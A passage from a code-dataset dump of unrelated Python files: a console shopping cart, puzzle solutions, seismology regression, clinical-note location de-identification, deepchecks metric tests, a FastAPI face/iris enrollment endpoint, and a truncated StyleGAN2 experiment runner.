{1:'肥皂',2:'牙刷',3:'牙膏',4:'毛巾',5:'卫衣',6:'短袖',7:'长裤',8:'短裤',9:'饮料',10:'零食',11:'鞋子',12:'马自达',13:'劳斯莱斯'}\ngoodsKey = tuple(goods.keys())\ngoodsValue = list(goods.values())\nmoney = {1: 3, 2: 5, 3: 8, 4: 5, 5: 30, 6: 20, 7: 30, 8: 20, 9: 3, 10: 6, 11: 25,12:200000,13:5000000}\nface = {1:'购物',2:'结账',3:'查看余额',4:'购物清单',5:'充值'}\nshop = list()\ncash = 100\n\nfile = open('shopHistory.txt', 'w')\nfile.write('商品列表:')\nfile.write(\"\\n\")\nfor i in goodsValue:\n file.write(str(i))\n file.write(' ')\nfile.write(\"\\n\")\n\ndef Face():\n print(' ')\n print(face)\n print(' ')\n a = eval(input(\"请选择想要操作的数字:\"))\n if a == 1:\n Shop()\n elif a == 2:\n Pay()\n elif a == 3:\n print(' ')\n print(\"{}元\".format(cash))\n Face()\n elif a == 4:\n Remove()\n elif a == 5:\n Cash()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Face()\n\ndef Shop():\n b = 1\n while b != 0:\n print(' ')\n print(goods)\n print(' ')\n b = eval(input(\"请选择你想购买的商品编号(0:退出):\"))\n shop.append(goodsKey[b-1])\n continue\n shop.pop(-1)\n Face()\n\ndef Pay():\n global cash\n pay = 0\n for m in shop:\n pay = pay + money[m]\n print(' ')\n p = eval(input(\"{}元,是否支付(1:支付,2:返回)\".format(pay)))\n if p == 1:\n if pay < cash:\n file.write('购买商品:')\n file.write(\"\\n\")\n for i in shop:\n file.write((goods[i]))\n file.write(' ')\n file.write(\"\\n\")\n print(' ')\n pa = eval(input(\"支付成功!是否退出(1:退出,2:返回界面)\"))\n cash = cash - pay\n if pa == 1:\n print(' ')\n print(\"祝您生活愉快!\")\n elif pa == 2:\n shop.clear()\n Face()\n else:\n print(' ')\n print(\"输入失败,请重新输入\")\n Pay()\n elif pay >= cash:\n print(' ')\n print(\"余额不足,请充值\")\n Face()\n elif p == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Pay()\n\ndef Cash():\n print(' ')\n c = eval(input(\"请输入充值金额:\"))\n global cash\n cash = cash + c\n print(' ')\n print(\"充值成功!\")\n Face()\n\ndef Remove():\n for i in shop:\n print(goods[i])\n print(' ')\n s = eval(input(\"是否删除商品:(1:是,2:否):\"))\n if s == 1:\n print(' ')\n ss = eval(input(\"请输入想要删除的商品编号:(0:退出)\"))\n try:\n shop.remove(ss)\n except:\n print(' ')\n print(\"该商品不在购物车中\")\n Remove()\n print(' ')\n print(\"删除成功!\")\n Face()\n elif s == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Remove()\ndef main():\n print(' ')\n print(\"《购物车》\")\n Face()\n file.close()\n\nmain()","repo_name":"Dzy0121/Gitspace","sub_path":"shopping.py","file_name":"shopping.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3399076289","text":"# 1835] 카드\n\nfrom collections import deque\nn = int(input())\ndq=deque()\nfor i in range(n,0,-1):\n dq.appendleft(i)\n # dq.rotate()\n for _ in range(i):\n dq.appendleft(dq.pop())\n \nprint(*dq)\n","repo_name":"devryyeong/problem-solving","sub_path":"BOJ/1835.py","file_name":"1835.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23484749458","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef GraphOmoriUtsu(df, gap, calcul_OU, ms_max_mag, foreshock):\n\n \"\"\"\n Fonction qui crée un graphe Omori-Utsu et calcule les K- & p-values\n :param df: données (table pandas)\n :param gap: taille des bars d'histograme (en s)\n :param calcul_OU: calcule de la loi OU (1) ou non (0)\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param foreshock: 1 = analyse des précurseurs\n 0 = analyse des répliques\n :return: objet graphe qui trace le nombre de séisme par jour (ligne) et la magnitude max par jour (point)\n Le titre est constitué de la localisation (jour) du main shock ainsi que des K- et p-values calculées\n \"\"\"\n\n nb_gap = int((df['sec'].max() - df['sec'].min()) // gap)\n nt = []\n magmax = []\n title = 'Earthquake number and maximal magnitude per day'\n\n for i in range(nb_gap + 1):\n dfbis = df[((i * gap + df['sec'].min()) <= df['sec']) & (((i + 1) * gap + df['sec'].min()) > df['sec'])]\n nt.append(len(dfbis))\n magmax.append(dfbis['mag'].max())\n\n fig, ax1 = plt.subplots()\n x = [i for i in range(nb_gap + 1)]\n # Ordonnée de gauche : # séismes / jour\n color = 'tab:blue'\n ax1.set_xlabel('time (day)')\n ax1.set_ylabel('Earthquake # per day', color=color)\n y = nt\n ax1.plot(x, y, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n # Ordonnée de droite : magnitude max / jour\n ax2 = ax1.twinx()\n color = 'tab:red'\n ax2.set_ylabel('Max magnitude per day', color=color)\n ax2.scatter(x, magmax, s=10, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n\n if calcul_OU == 1:\n if foreshock == 1:\n a, b, idx_ms = RegressionOU_foreshock(1, nt, ms_max_mag, magmax)\n study = 'foreshocks'\n else:\n a, b, idx_ms = RegressionOU(1, nt, ms_max_mag, magmax)\n study = 'aftershocks'\n\n title = 'Main shock at ' + str(idx_ms) + ' days / p-value (' + study + ') = ' + str(round(-a, 2)) + \\\n ' / K-value = ' + str(round(10 ** b))\n\n ax1.set_title(title)\n fig.tight_layout()\n plt.show()\n\n if calcul_OU == 1:\n return a, b, idx_ms\n\n \ndef RegressionOU(c, nt, ms_max_mag, magmax):\n\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des répliques\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n t = [(idx_ms + i) for i in range(len(nt) - idx_ms)]\n x = []\n y = []\n for i in range(len(nt) - idx_ms):\n if nt[i + idx_ms] != 0:\n y.append(np.log10(nt[i + idx_ms]))\n x.append(np.log10(c + t[i]))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n\ndef RegressionOU_foreshock(c, nt, ms_max_mag, magmax):\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des précurseurs\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n x = []\n y = []\n for i in range(idx_ms):\n if nt[i] != 0:\n y.append(np.log10(nt[i]))\n x.append(np.log10(c + i))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n \nif __name__ == '__main__':\n\n df = pd.read_csv('../data_SNat/CDSA_SeulementEssaimSaintes_2004-2005.txt', sep=\"\\s+\")\n\n # 1 jour = 86 400 sec\n gap = 3600 * 24\n # Calcul de p et K\n GraphOmoriUtsu(df, gap, 1, 1, 0)","repo_name":"Skaddd/GeoScience","sub_path":"Codes_Graphes/OmoriUtsu.py","file_name":"OmoriUtsu.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"5302017354","text":"import re\nimport sys\nimport locationtagger\nfrom nltk.tag import pos_tag\n\n\"\"\"\nFrank Chien\nAssignment 8 - de-identification\n10/15/21\n\nThis script adapts the phone tagger patient information de-identification algorithm.\nThe chosen category for this assignment is 'locations'.\nIn the deid_phone function, instead of calling check_for_phone this script will call check_for_location\nThe check_for_location function represents my work.\n\nInstead of the approach used in the PELR script, this assignment uses a natural language processing approach.\nThe strategy for location PHI identification is as follows\n!) use location tagger to identify locations\n2) use nltk part of speech tagging to identify proper nouns\n3) The intersect of locations and proper nouns are flagged as location PHI\n\nThe reason why proper nouns were used as a requirement is because the words such as \"home\" or \"hospital\" would\nrepresent (and correctly be tagged) as locations. However, do not offer identifiable patient information.\nLocations such as \"Calvert\" or \"Boston\" for instance would be identifiable information and are proper nouns.\n\nOne difficulty this strategy encountered was the sensitivity and specificity of the strategy relies on the performance\nof both the location tagger and the part of speech tagger. Since the input was medical documentation, which includes\nspecific language, syntax, sympbols, and abbreviations which are not seen in other domains of common English,the\nnatural language processing components had difficulty. For example, \"Aline\" was frequently tagged as a location, whereas\nphysicians/nurses would understand 'aline' as an arterial line, a piece of medical equipment. Another example is that\nsome notes were written in all-caps. The NLTK POS tagger relies on caplitalization to identify proper nouns, thus\nfor these notes, many tokens were incorrectly tagged as as 'NNP', or proper noun.\n\nIn summary, using a natural language processing approach to medical note deindification is a challenge due to the difficulty in parsing medical language with NLP tools,\nwhich can be very different syntactically and in lexicon from common English.\n\nUnfortunately, the performance of this NLP strategy as implemented is poor. Though the algorithm detected some locations correctly\n(56 true positives), the number of false positives and false negatives were great (816, and 311, respectively). A large number of\ntokens were incorrectly identified as a location (such as \"aline\") and further, incorrectly tagged as proper nouns.\nThis exercise has been a demonstration of both how medical record de-identification works, but also of the difficulty in\nanalyzing medical texts as natrual language.\n \nThe location tagger was obtained at\nhttps://pypi.org/project/locationtagger/\n\"pip install location tagger\" was run on terminal to install the location tagger\nFollowing the instructions from the website, the command \"python -m spacy download en\" was required.\nThe location tagger is maintained by kaushiksoni10 and has an open source license\nPer webiste, \"OSI approved::MIT license\"\n\nPart of speech tagging was achieved throught he NLTK tagger pos_tag. \n\n\"\"\"\n\ndef check_for_phone(patient,note,chunk, output_handle):\n #ths is the original code written by Clifford Lab\n \"\"\"\n Inputs:\n - patient: Patient Number, will be printed in each occurance of personal information found\n - note: Note Number, will be printed in each occurance of personal information found\n - chunk: one whole record of a patient\n - output_handle: an opened file handle. The results will be written to this file.\n to avoid the time intensive operation of opening and closing the file multiple times\n during the de-identification process, the file is opened beforehand and the handle is passed\n to this function. \n Logic:\n Search the entire chunk for phone number occurances. Find the location of these occurances \n relative to the start of the chunk, and output these to the output_handle file. \n If there are no occurances, only output Patient X Note Y (X and Y are passed in as inputs) in one line.\n Use the precompiled regular expression to find phones.\n \"\"\"\n # The perl code handles texts a bit differently, \n # we found that adding this offset to start and end positions would produce the same results\n offset = 27\n\n # For each new note, the first line should be Patient X Note Y and then all the personal information positions\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n\n # search the whole chunk, and find every position that matches the regular expression\n # for each one write the results: \"Start Start END\"\n # Also for debugging purposes display on the screen (and don't write to file) \n # the start, end and the actual personal information that we found\n\n\n for match in ph_reg.finditer(chunk):\n \n # debug print, 'end=\" \"' stops print() from adding a new line\n print(patient, note,end=' ')\n print((match.start()-offset),match.end()-offset, match.group())\n \n # create the string that we want to write to file ('start start end') \n result = str(match.start()-offset) + ' ' + str(match.start()-offset) +' '+ str(match.end()-offset) \n \n # write the result to one line of output\n output_handle.write(result+'\\n')\n\n\ndef check_for_location(patient,note,chunk, output_handle):\n #this is the function wrote by Frank Chien for the assignment\n #please see comment above for description of the strategy\n\n offset = 27 #identified offset required by clifford lab\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n #print(patient, note) #allows us to see how many notes the algorithm has worked through\n \n #using the location tagger \n locations = locationtagger.find_locations(text = chunk) #locationtagger returns a location object\n all_locations = locations.countries + locations.regions + locations.cities #location objects stores locations in 3 places, as countries, locations, and cities\n \n #using the NLTK part of speech tagger\n tagged_chunk = pos_tag(chunk.split()) #first split into tokens, then tag\n\n for location in all_locations: #iterates through identified locations\n for token_pos in tagged_chunk: #looks for location in list of tagged tokens. token_pos is a tuple: (token, part of speech tag)\n if location.lower() == token_pos[0].lower(): #to match location to token, only lower cases are used\n if token_pos[1]=='NNP': #if the token is a proper noun, we have identified a possible location PHI\n substring=token_pos[0] \n indices=[_.start() for _ in re.finditer(substring,chunk)] #uses a regex to identify all instances of the location within the chunk\n for start_pos in indices: #composes the result line to be written to the output file\n start_pos = start_pos - offset \n end_pos = start_pos + len(substring)\n result = str(start_pos) + ' ' + str(start_pos) + ' '+ str(end_pos)\n\n output_handle.write(result+'\\n') #writes result to output file\n\n break #break the loop and check for the next location token. The regex iterator will already obtain all instances of the location in the chunk.\n \n \n \ndef deid_phone(text_path= 'id.text', output_path = 'phone.phi'):\n \n \"\"\"\n Inputs: \n - text_path: path to the file containing patient records\n - output_path: path to the output file.\n \n Outputs:\n for each patient note, the output file will start by a line declaring the note in the format of:\n Patient X Note Y\n then for each phone number found, it will have another line in the format of:\n start start end\n where the start is the start position of the detected phone number string, and end is the detected\n end position of the string both relative to the start of the patient note.\n If there is no phone number detected in the patient note, only the first line (Patient X Note Y) is printed\n to the output\n Screen Display:\n For each phone number detected, the following information will be displayed on the screen for debugging purposes \n (these will not be written to the output file):\n start end phone_number\n where `start` is the start position of the detected phone number string, and `end` is the detected end position of the string\n both relative to the start of patient note.\n \n \"\"\"\n # start of each note has the patter: START_OF_RECORD=PATIENT||||NOTE||||\n # where PATIENT is the patient number and NOTE is the note number.\n start_of_record_pattern = '^start_of_record=(\\d+)\\|\\|\\|\\|(\\d+)\\|\\|\\|\\|$'\n\n # end of each note has the patter: ||||END_OF_RECORD\n end_of_record_pattern = '\\|\\|\\|\\|END_OF_RECORD$'\n\n # open the output file just once to save time on the time intensive IO\n with open(output_path,'w+') as output_file:\n with open(text_path) as text:\n # initilize an empty chunk. Go through the input file line by line\n # whenever we see the start_of_record pattern, note patient and note numbers and start \n # adding everything to the 'chunk' until we see the end_of_record.\n chunk = ''\n #remove later\n # counter=0\n for line in text:\n record_start = re.findall(start_of_record_pattern,line,flags=re.IGNORECASE)\n if len(record_start):\n patient, note = record_start[0]\n chunk += line\n\n # check to see if we have seen the end of one note\n record_end = re.findall(end_of_record_pattern, line,flags=re.IGNORECASE)\n\n if len(record_end):\n # Now we have a full patient note stored in `chunk`, along with patient numerb and note number\n # pass all to check_for_phone to find any phone numbers in note.\n\n #check_for_phone(patient,note,chunk.strip(), output_file)\n check_for_location(patient, note, chunk.strip(), output_file)\n # counter+=1\n # if(counter>0):\n # break\n\n #this the one we need to modify above - \n \n # initialize the chunk for the next note to be read\n chunk = ''\n\n \nif __name__== \"__main__\":\n print(sys.prefix)\n deid_phone(sys.argv[1], sys.argv[2])\n \n","repo_name":"thisishcb/BMI500_HW8_Deid_Date","sub_path":"python/deid-FrankChien.py","file_name":"deid-FrankChien.py","file_ext":"py","file_size_in_byte":10776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"22077981767","text":"def read_data(data_path):\n \"\"\"\n Reads data\n \"\"\"\n heightmap = []\n f = open(data_path, \"r\")\n for x in f:\n heightmap.append([int(h) for h in x.strip()])\n return heightmap\n\n\ndef is_lowest(heightmap, i, j):\n \"\"\"\n Searches for lowest poi nt\n \"\"\"\n height = heightmap[i][j]\n if (j > 0) and (heightmap[i][j - 1] <= height):\n return False\n if (j < len(heightmap[i]) - 1) and (heightmap[i][j + 1] <= height):\n return False\n if (i > 0) and (heightmap[i - 1][j] <= height):\n return False\n if (i < len(heightmap) - 1) and (heightmap[i + 1][j] <= height):\n return False\n return True\n\n\ndef basin_size(hmap, i, j):\n \"\"\"\n Calculates basin size\n \"\"\"\n\n # Initialize sets and add first point\n basin = set()\n current = set()\n basin.add((i, j))\n current.add((i, j))\n new = current\n\n # Do while there are new points\n while len(new) > 0:\n new = set()\n # Look around the points in new and add them to basin and new\n for point in current:\n for [x, y] in [[1, 0], [0, 1], [-1, 0], [0, -1]]:\n if point[0] + y >= 0 and point[1] + x >= 0:\n if point[0] + y < len(hmap):\n if point[1] + x < len(hmap[point[0] + y]):\n if hmap[point[0] + y][point[1] + x] < 9:\n point_new = (point[0] + y, point[1] + x)\n if point_new not in basin:\n basin.add(point_new)\n new.add(point_new)\n # Update sets\n current = new\n return len(basin)\n\n\nif __name__ == \"__main__\":\n\n # Read data\n data_path = \"input\"\n heightmap = read_data(data_path)\n\n # Basin evaluation\n risk = 0\n basins = []\n\n for i in range(len(heightmap)):\n for j in range(len(heightmap[i])):\n if is_lowest(heightmap, i, j):\n risk += heightmap[i][j] + 1\n basins.append(basin_size(heightmap, i, j))\n\n print(f\"Total risk is {risk}\")\n basins.sort()\n print(f\"Multiplied sizes {basins[-1] * basins[-2] * basins[-3]}\")\n","repo_name":"jakuberan/AoC-2021","sub_path":"day_09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73640380524","text":"import json\nfrom functions.validate import validate_event\n\ndef validate(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n response = validate_event(event, context)\n return response\n\ndef process(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n return {\n \"body\": \"been processed ty\"\n }\n\ndef hello(event, context):\n body = {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"input\": event\n }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body)\n }\n\n return response\n\n # Use this code if you don't use the http event with the LAMBDA-PROXY\n # integration\n \"\"\"\n return {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"event\": event\n }\n \"\"\"\n","repo_name":"Mac-lp3/stepy","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17299939043","text":"from hamcrest import assert_that, close_to, has_items, has_length\nfrom numpy import nanmean\n\nfrom deepchecks.vision import VisionData\nfrom deepchecks.vision.metrics_utils.detection_precision_recall import ObjectDetectionAveragePrecision\nfrom deepchecks.vision.metrics_utils.scorers import calculate_metrics\nfrom deepchecks.vision.metrics_utils.semantic_segmentation_metrics import MeanDice, MeanIoU, per_sample_dice\n\n\ndef test_default_ap_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AveragePrecision': ObjectDetectionAveragePrecision()},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res.keys(), has_length(1))\n assert_that(res['AveragePrecision'], has_length(80))\n\n\ndef test_ar_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AverageRecall': ObjectDetectionAveragePrecision(return_option='ar')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n\n assert_that(res.keys(), has_length(1))\n assert_that(res['AverageRecall'], has_length(80))\n\n\ndef test_equal_pycocotools(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n metric = ObjectDetectionAveragePrecision(return_option=None)\n for batch in coco_test_visiondata:\n label = coco_test_visiondata.batch_to_labels(batch)\n prediction = coco_test_visiondata.infer_on_batch(batch, mock_trained_yolov5_object_detection, device)\n metric.update((prediction, label))\n res = metric.compute()[0]\n\n assert_that(metric.get_classes_scores_at(res['precision'], area='all', max_dets=100), close_to(0.409, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.5, area='all', max_dets=100),\n close_to(0.566, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.75, area='all', max_dets=100),\n close_to(0.425, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='small', max_dets=100), close_to(0.212, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='medium', max_dets=100), close_to(0.383, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='large', max_dets=100), close_to(0.541, 0.001))\n\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=1), close_to(0.330, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=10), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=100), close_to(0.429, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='small', max_dets=100), close_to(0.220, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='medium', max_dets=100), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100), close_to(0.549, 0.001))\n\n # unrelated to pycoco but needed to check another param\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100, get_mean_val=False,\n zeroed_negative=False), has_items([-1]))\n assert_that(metric.get_classes_scores_at(res['recall'], get_mean_val=False, zeroed_negative=False), has_items([-1]))\n\n\ndef test_average_precision_recall(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(),\n 'ap_macro': ObjectDetectionAveragePrecision(average='macro'),\n 'ap_weighted': ObjectDetectionAveragePrecision(average='weighted')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n # classes mean and macro are not equal due to zeroed negative\n assert_that(nanmean(res['ap']), close_to(0.396, 0.001))\n assert_that(res['ap_macro'], close_to(0.409, 0.001))\n assert_that(res['ap_weighted'], close_to(0.441, 0.001))\n\n\ndef test_average_precision_thresholds(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(iou_range=(0.4, 0.8, 5), average='macro')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res['ap'], close_to(0.514, 0.001))\n\n\ndef test_segmentation_metrics(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model,\n device):\n dice_per_class = MeanDice()\n dice_micro = MeanDice(average='micro')\n dice_macro = MeanDice(average='macro')\n iou_per_class = MeanIoU()\n iou_micro = MeanIoU(average='micro')\n iou_macro = MeanIoU(average='macro')\n\n for batch in segmentation_coco_train_visiondata:\n label = segmentation_coco_train_visiondata.batch_to_labels(batch)\n prediction = segmentation_coco_train_visiondata.infer_on_batch(\n batch, trained_segmentation_deeplabv3_mobilenet_model, device)\n dice_per_class.update((prediction, label))\n dice_micro.update((prediction, label))\n dice_macro.update((prediction, label))\n iou_per_class.update((prediction, label))\n iou_micro.update((prediction, label))\n iou_macro.update((prediction, label))\n assert_that(dice_per_class.compute()[0], close_to(0.973, 0.001))\n assert_that(dice_per_class.compute(), has_length(17))\n assert_that(dice_micro.compute(), close_to(0.951, 0.001))\n assert_that(dice_macro.compute(), close_to(0.649, 0.006))\n assert_that(iou_per_class.compute()[0], close_to(0.948, 0.001))\n\n\ndef test_per_sample_dice(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model, device):\n batch = next(iter(segmentation_coco_train_visiondata))\n predictions = segmentation_coco_train_visiondata.infer_on_batch(batch,\n trained_segmentation_deeplabv3_mobilenet_model,\n device)\n labels = batch[1]\n res = per_sample_dice(predictions, labels)\n assert_that(sum(res), close_to(9.513, 0.001))\n","repo_name":"cmendozab/deepchecks","sub_path":"tests/vision/utils_tests/metrics_test.py","file_name":"metrics_test.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"4727400977","text":"from fastapi import APIRouter, Depends, status, HTTPException, UploadFile, File\nfrom fastapi.responses import HTMLResponse\nfrom sqlalchemy.orm import Session\nimport numpy as np\nimport random\nimport time\nimport cv2\nimport os\n\nfrom core.face import FaceRecognition\nfrom core.iris import IrisRecognition\nfrom core.setting import *\nfrom server import database, models\n\nfrom pydantic import BaseModel\nfrom typing import Union\n\n\n# An instance of face-recognition\ninstace_face = FaceRecognition(MODELS, METRICS)\ninstace_iris = IrisRecognition()\n\n# Set router\nrouter = APIRouter(\n tags=['Add New User'],\n prefix=\"/add\"\n)\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def add(\n name_user : str, \n face_file : UploadFile = File(description=\"Upload Face image\"),\n iris_file_1 : UploadFile = File(description=\"Upload Iris 1 image\"),\n iris_file_2 : UploadFile = File(description=\"Upload Iris 2 image\"),\n db: Session = Depends(database.get_db)\n ):\n\n\n\n # Read image contents\n try:\n face_contents = await face_file.read()\n iris_1_contents = await iris_file_1.read()\n iris_2_contents = await iris_file_2.read()\n\n # Make image format in opencv and save temporal image\n name = f'./temporal/{time.time()}_{int(random.random()*1000)}'\n\n nparr = np.fromstring(face_contents, np.uint8)\n face_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_face.png', face_img)\n\n nparr = np.fromstring(iris_1_contents, np.uint8)\n iris_1_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_1.png', iris_1_img)\n\n nparr = np.fromstring(iris_2_contents, np.uint8)\n iris_2_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_2.png', iris_2_img)\n except:\n return {\"detail\" : \"Error in reading data\"}\n\n # Embedding all images\n try:\n face_embed = instace_face.embedding(name+'_face.png')\n iris_1_embed = instace_iris.embedding(name+'_iris_1.png')\n iris_2_embed = instace_iris.embedding(name+'_iris_2.png')\n\n # Remove files\n os.remove(name+'_face.png')\n os.remove(name+'_iris_1.png')\n os.remove(name+'_iris_2.png')\n except:\n return {\"detail\": \"Error in embedding\"}\n\n # Add new User \n try:\n new_user = models.User(name=name_user, face=str(face_embed['Facenet']), iris_1= str(iris_1_embed), iris_2= str(iris_2_embed))\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n\n return {\"detail\" : f\"Information accepted and pushed to databse with name ({name_user})\"}\n except:\n return {\"detail\" : \"Problem in adding user to database\"}\n \n","repo_name":"mertz1999/Dual-Authentication","sub_path":"server/routers/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"70520972845","text":"import numpy as np\r\nfrom shapely import LineString\r\nfrom shapely import Point\r\nfrom shapely import line_interpolate_point\r\n\r\n\r\ndef get_unit_vector(a: np.array, b: np.array) -> np.array:\r\n \"\"\"get the unit vector point in the direction point A -> point B\"\"\"\r\n vector = np.subtract(b, a)\r\n unit_v = vector / np.linalg.norm(vector)\r\n if not 0.99 < np.linalg.norm(unit_v) < 1.01:\r\n raise ValueError\r\n return unit_v[0]\r\n\r\n\r\ndef rotate_90_deg(start_point: np.array, end_point: np.array, clockwise: bool) -> np.array:\r\n \"\"\"find the coordinates of the end_point\r\n - rotated 90 degrees around the start point,\r\n - in the given direction (clockwise or counterclockwise)\r\n \"\"\"\r\n vector = np.subtract(end_point, start_point)\r\n\r\n if clockwise:\r\n rot = np.array([[0, 1], [-1, 0]])\r\n return start_point + vector @ rot\r\n else:\r\n rot = np.array([[0, -1], [1, 0]])\r\n return start_point + vector @ rot\r\n\r\n\r\nclass PlineString(LineString):\r\n\r\n def __init__(self, *args, left_clockwise=True, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n # if true, clockwise turn from the first point is left\r\n self.left_clockwise = left_clockwise\r\n\r\n def point_at_distance(self, d: float) -> Point:\r\n \"\"\"interpolate a point at a given distance of the starting point of the linestring\"\"\"\r\n point = line_interpolate_point(self, d)\r\n assert isinstance(Point, point)\r\n return point\r\n\r\n def get_perpendicular_unit_vector(self, d: float, left=True, delta=10):\r\n \"\"\"get a unit vector\r\n - locally perpendicular to the plinestring at +- delta units\r\n - at the point at distance d\r\n - in the given direction (left or right)\r\n \"\"\"\r\n\r\n # create a local segment from d to d+10 m to find the perpendicular to\r\n point = list(self.point_at_distance(d).coords)\r\n end_point = list(self.point_at_distance(d + delta).coords)\r\n\r\n if left:\r\n clockwise = self.left_clockwise\r\n else:\r\n clockwise = not self.left_clockwise\r\n\r\n # find a point in this direction\r\n new_end_point = rotate_90_deg(np.array(point), np.array(end_point), clockwise)\r\n return get_unit_vector(point, new_end_point)\r\n","repo_name":"puijterwaal/shaplien","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3522348224","text":"### this will be copied to colab\n### everything else imported\nfrom StyleGAN2TTTExperiment import StyleGAN2TTTExperiment\nimport sys\nimport os\n\nimport torch\nimport numpy as np\nimport random\n\ndef run(args):\n e = StyleGAN2TTTExperiment() \n #print(args)\n e.set_args(args)\n e.setup()\n ## SETUP\n #if args.TTT:\n if args.method == 'TNet+TTT' or args.method == 'TTTz':\n e.setup_prenetwork_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TTTw':\n e.setup_prenetwork_w_ttt()\n if args.method == 'TNet+TTT' or args.method == 'TNet':\n e.setup_intranetwork_ttt()\n print('finished setup')\n\n ## TRAIN\n # may need to set train_sample_size\n if args.method == 'TNet+TTT':\n e.train_prenetwork_and_intranetwork_ttt()\n elif 